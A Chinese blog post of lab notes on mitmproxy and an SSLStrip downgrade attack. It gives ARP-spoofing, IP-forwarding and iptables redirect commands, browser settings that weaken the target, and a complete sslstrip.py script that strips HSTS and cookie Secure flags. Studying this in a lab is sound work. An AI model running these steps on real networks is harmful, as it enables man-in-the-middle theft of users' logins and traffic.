SSLStrip-基于mitmproxy

最新推荐文章于 2024-08-28 08:19:49 发布
最新推荐文章于 2024-08-28 08:19:49 发布
阅读量1k 收藏 9
点赞数 23
分类专栏: 网安学习 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51031096/article/details/140301835
版权

1. 基本用法

1.1 拦截请求

在主界面输入 i,之后在下方弹出的 set intercept ‘ ’中,在‘’中补充过滤规则,一些常用过滤规则

Bash
~http        过滤http流
 

选定拦截的规则,摁 a 可进行恢复,摁 X kill掉该请求

1.1.1 过滤规则

过滤方法详细可参照:Filter expressions

1.2 拦截修改

拦截下的数据可摁enter进入详细页面,接着摁e进行修改,摁e弹出可修改的参数,选中参数后摁enter可进入修改界面,在第一行修改/添加值即可,之后摁esc再摁q返回之前的详细页面,之后摁a恢复请求,此时表示服务端已收到当前请求并对修改后的请求返回响应。此时摁方向键进入Response界面然后摁e以同样的方式修改数据,修改完成后 摁 ctrl + x 进行保存然后输入y  再摁 enter 进行退出,之后再摁 a 即可将请求发送给客户端

1.3 重放

重放请求是将拦截的请求再次向服务器发送,该操作不会向客户端再次反馈,只是中间人与服务器的请求操作。更新服务器的返回。该操作可随便选中一个请求摁 r 即可进行重放

2. 使用mitmproxy进行SSLStrip

2.1 环境准备

攻击机:Kali Linux 2023.4

靶机: Ubuntu

2.2 基本准备

2.2.1 攻击机准备

首先使用攻击机进行arp欺骗,该操作可使用kaliarpspoof进行

Bash
sudo arpspoof -i eth0 -t 192.168.60.130 192.168.60.2
                 <网卡>      <靶机IP>      <网关地址>

流量转发:开启网卡的流量转发功能

Bash
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

监听端口:将目的端口为80的流重定向到8080端口

Bash
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

2.2.2 靶机准备

Ubuntu靶机firefox关闭HSTS

Bash
浏览器中输入“about:config”
security.mixed_content.block_active_content      设置为 false
security.mixed_content.block_display_content       设置为false
关闭 Firefox 浏览器,并重新打开即可

2.3 下载sslstrip插件并执行sslstrip

sslstrip脚本下载地址(也可在文末找到):https://github.com/mitmproxy/mitmproxy/blob/main/examples/contrib/sslstrip.py

sslstrip运行命令

Bash
mitmproxy -s sslstrip.py

2.4 复现过程

靶机打开网站,直接访问发现已经使用http连接

点击登录,发现mitmproxy后台已经拦截下该请求,

2.5 SSLStrip代码

Bash
# 也可自行编写放入
"""
This script implements an sslstrip-like attack based on mitmproxy.
https://moxie.org/software/sslstrip/
"""

import re
import urllib.parse

from mitmproxy import http

# set of SSL/TLS capable hosts
secure_hosts: set[str] = set()


def request(flow: http.HTTPFlow) -> None:
    flow.request.headers.pop("If-Modified-Since", None)
    flow.request.headers.pop("Cache-Control", None)

    # do not force https redirection
    flow.request.headers.pop("Upgrade-Insecure-Requests", None)

    # proxy connections to SSL-enabled hosts
    if flow.request.pretty_host in secure_hosts:
        flow.request.scheme = "https"
        flow.request.port = 443

        # We need to update the request destination to whatever is specified in the host header:
        # Having no TLS Server Name Indication from the client and just an IP address as request.host
        # in transparent mode, TLS server name certificate validation would fail.
        flow.request.host = flow.request.pretty_host


def response(flow: http.HTTPFlow) -> None:
    assert flow.response
    flow.response.headers.pop("Strict-Transport-Security", None)
    flow.response.headers.pop("Public-Key-Pins", None)

    # strip links in response body
    flow.response.content = flow.response.content.replace(b"https://", b"http://")

    # strip meta tag upgrade-insecure-requests in response body
    csp_meta_tag_pattern = rb'<meta.*http-equiv=["\']Content-Security-Policy[\'"].*upgrade-insecure-requests.*?>'
    flow.response.content = re.sub(
        csp_meta_tag_pattern, b"", flow.response.content, flags=re.IGNORECASE
    )

    # strip links in 'Location' header
    if flow.response.headers.get("Location", "").startswith("https://"):
        location = flow.response.headers["Location"]
        hostname = urllib.parse.urlparse(location).hostname
        if hostname:
            secure_hosts.add(hostname)
        flow.response.headers["Location"] = location.replace("https://", "http://", 1)

    # strip upgrade-insecure-requests in Content-Security-Policy header
    csp_header = flow.response.headers.get("Content-Security-Policy", "")
    if re.search("upgrade-insecure-requests", csp_header, flags=re.IGNORECASE):
        csp = flow.response.headers["Content-Security-Policy"]
        new_header = re.sub(
            r"upgrade-insecure-requests[;\s]*", "", csp, flags=re.IGNORECASE
        )
        flow.response.headers["Content-Security-Policy"] = new_header

    # strip secure flag from 'Set-Cookie' headers
    cookies = flow.response.headers.get_all("Set-Cookie")
    cookies = [re.sub(r";\s*secure\s*", "", s) for s in cookies]
    flow.response.headers.set_all("Set-Cookie", cookies)

sslstrip安装
qq_44881113的博客
08-22 2085
SSLStrip 攻击 SSLstrip 也叫 https 降级攻击,攻击者拦截用户流量后,欺骗用户与攻击者进行 http 通信,攻击者与服务器保持正常通信 (http 或 https),从而获取用户信息。 攻击原理 通过中间人攻击监听 http 流量(自己试验可以通过设置 http 代理) 更改重定向链接中的 location,替换 https 为 http,并记录 更改响应内容中的超链接,替换 https 为 http,并记录 与用户进行 http 通信,与服务器进行 https 通信(记录中本应是 h
Kali linux 学习笔记(五十八)Web渗透——SSL(sslsplit、Mitmproxysslstrip) 2020.4.2
闵行小鱼塘
04-02 2659
本节学习SSL
SSL剥离工具sslstrip
02-15 763
SSL剥离工具sslstrip 在日常上网过程中,用户只是在地址栏中输入网站域名,而不添加协议类型,如HTTP和HTTPS。这时,浏览器会默认在域名之前添加http://,然后请求网站。如果网站采...
SSLstrip 中间人欺骗Https转Http获取密码
weixin_34347651的博客
05-24 397
***回顾SSLstrip + EtterCap 中间人***实现https转换成http 以获取帐号密码。Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward然后开启Ettercap的iptables 功能把注析去掉来个arp欺骗不使用...
SSLStrip 终极版 —— location 瞒天过海
weixin_33881140的博客
05-13 905
之前介绍了 HTTPS 前端劫持 的方案,尽管非常有趣。然而现实却并不理想。其唯一、也是最大的缺陷。就是无法阻止脚本跳转。若是没有这个缺陷,那就非常完美了 —— 当然也就没有必要写这篇文章了。 说究竟,还是由于无法重写 location 这个对象 —— 它是脚本跳转的唯一渠道。虽然也流传一些 Hack 能勉强实现,但终究是不靠谱的。 其实,在近期封稿的 HTML5 ...
【流量劫持】SSLStrip 的未来 —— HTTPS 前端劫持
weixin_34413357的博客
10-14 499
前言 在之前介绍的流量劫持文章里,曾提到一种『HTTPS 向下降级』的方案 —— 将页面中的 HTTPS 超链接全都替换成 HTTP 版本,让用户始终以明文的形式进行通信。 看到这,也许大家都会想到一个经典的中间人攻击工具 —— SSLStrip,通过它确实能实现这个效果。 不过今天讲解的,则是完全不同的思路,一种更有效、更先进的解决方案 —— HTTPS 前端劫持。 后端的缺陷 在过去,流量劫...
五种工具理解SSL/TLS中间人攻击
redwand的博客
04-06 5425
本文先使用ettercap实现了普通的中间人攻击,然后根据burpsuite抓取https流量的原理,解析了sslsplit解密ssl流量的过程,同时演示了mitmproxy的劫持方式,最后简单说明了sslstrip的工作原理,通过多种实验的方式更好的学习了sll中间人攻击。
基于Python的中间人攻击与防范策略
# 1. 中间人攻击概述 ## 1.1 什么是中间人攻击 中间人攻击(Man-in-the-Middle Attack,简称MITM)是一种常见的网络攻击方式,攻击者通过篡改、截获或转发数据流量,使得两个通信主体之间的通信被中断或被监听。...
Kali Linux:渗透测试工具大全
它包含了大量的安全工具,适用于32位和64位的x86架构,以及基于ARM架构的设备如树莓派和Chromebook。此PDF文档‘KaliLinuxToolsListing’列出了众多集成在Kali Linux中的信息收集和嗅探/欺骗工具,由Mario Hero于...
kaliWEB渗透笔记
fhl5203的博客
11-01 5379
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
SSLstrip0.9
10-11
著名的SSL中间人攻击工具SSLstrip最新版0.9版
sslstrip-master.zip
03-17
sslstrip可以帮助我们将https协议转换为http协议,从而帮助我们在https协议抓包获取数据。
局域网嗅探工具
08-21
很好用的一款局域网嗅探工具,对于查找局域网内计算机很有用处。
sslstrip-0.2
11-01
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.
tcpdump抓包https
最新发布
12-26
1. **使用第三方工具**:例如`mitmproxy` 或 `sslstrip`这样的中间代理工具,它们可以在不破解证书的情况下捕获HTTPS流量,并提供明文内容。 2. **使用Wireshark**:这是一个更高级别的网络分析工具,它内置了支持...
sslstrip 中间人HTTP
weixin_30361641的博客
04-25 121
https://moxie.org/software.html http://bbs.pediy.com/thread-173970.htm https://www.cnblogs.com/index-html/p/ssl-frontend-hijack.html http://www.cnblogs.com/BloodZero/p/4415483.html 转载于:https://www....
推荐开源项目:SSLstrip+
gitblog_00014的博客
06-03 417
推荐开源项目:SSLstrip+ sslstrip2A mirror of the original SSLstrip+ code by Leonardo Nve项目地址:https://gitcode.com/gh_mirrors/ss/sslstrip2 1、项目介绍 SSLstrip+ 是一个由 Leonardo Nve 创建并维护的项目,它最初是对 Moxie 的著名工具 SSLstri...
SSLstrip+:绕过HTTPS防护的网络审计利器
gitblog_00443的博客
08-28 437
SSLstrip+:绕过HTTPS防护的网络审计利器 sslstrip2A mirror of the original SSLstrip+ code by Leonardo Nve项目地址:https://gitcode.com/gh_mirrors/ss/sslstrip2 项目介绍 SSLstrip+ 是由Leonardo Nve开发的一个安全研究工具,旨在展示并利用网络通信中的安全漏洞。...
SSLSTrip--Usage
weixin_34216036的博客
03-23 256
内容来自网络加上自己的一点编辑,Requirements:Python >= 2.5 (apt-get install python)The python "twisted-web" module (apt-get install python-twisted-web)Setup:tar zxvf sslstrip-0.9.tar.gzcd sslstrip-0.9(o...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值